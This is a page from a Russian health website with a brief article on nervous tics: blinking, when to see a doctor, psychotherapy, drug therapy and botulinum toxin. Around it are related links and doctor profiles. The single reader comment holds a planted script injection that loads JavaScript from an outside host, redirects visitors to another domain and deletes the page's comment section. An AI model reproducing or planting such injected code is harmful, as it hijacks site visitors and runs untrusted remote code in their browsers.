Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Нервный тик  >>  Нервный тик
 
Обратная связь
 

Нервный тик

Размер шрифта
09 апреля 2012 09:50
  • google_analytics: false
  • Нравится

Бывают ли у вас непреодолимые движения против собственной воли? Замечали ли вы повторяющиеся неосознанные движения у себя или близких? Дергаются ли у вас мышцы лица?

Нервный тик – это не обязательно движения лица. К нервным тикам относятся и все остальные навязчивые движения. Такие движения, в том или ином виде, присутствуют у многих людей. У большинства людей движения простые, на которые обычно не обращают внимания.

Нервные тики относятся к группе гиперкинезов, т.е. избыточных движений. Эти движения не связаны с волей, они происходят помимо нее. Нервные тики были у многих великих людей, например, у Моцарта.

Нервный тик с морганием – один из самых часто встречающихся. В норме моргание используется для смачивания глаза слезной жидкостью. Если возникает нервный импульс независимо от воли, навязчивое моргание становится частым и непреодолимым. Часто такие движения воспринимаются окружающими как гримасы. Навязчивое моргание может развиваться и как следствие переутомления глаз.

Как лечить

К врачу следует обращаться, когда тик начинает мешать жизни. В некоторых случаях, особенно у детей, может помочь психотерапия. На занятиях человек учится контролировать избыточные движения и воспроизводить их осознанно. При сложных тиках приходится прибегать к лекарственной терапии под контролем психиатра. В редких случаях блокируется мышца, которая непроизвольно сокращается при тике. Используется при этом давно известный и популярный в эстетической медицине ботулотоксин.

Сюжеты по теме:
Нервный тик: как поставить диагноз и как лечить

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:45

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Отсутствие общения высушивает нервы   Ученые научились стирать память   Открытие в науке: обнаружен белок, восстанавливающий нервы   Как магнитная буря влияет на ваше здоровье?  
25 января 2013Обезьян научили определять время без часов 02 июля 2013Лечить головную боль можно без лекарств! Ученые подключают электричество к нервам!
 
01 мая 2013Что удобнее: рюкзак или портфель? Неважно! Тяжелый рюкзак разрушает нервы и мышцы! 08 апреля 2013Что надо есть, чтобы не было паралича
 

Слайдшоу

1
Супереда от Паркинсона 5 симптомов, которые спасут вашу жизнь
Вся правда о клиторе Что скрывает головная боль
Что вы знаете о шизофрении? Что такое мигрень
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.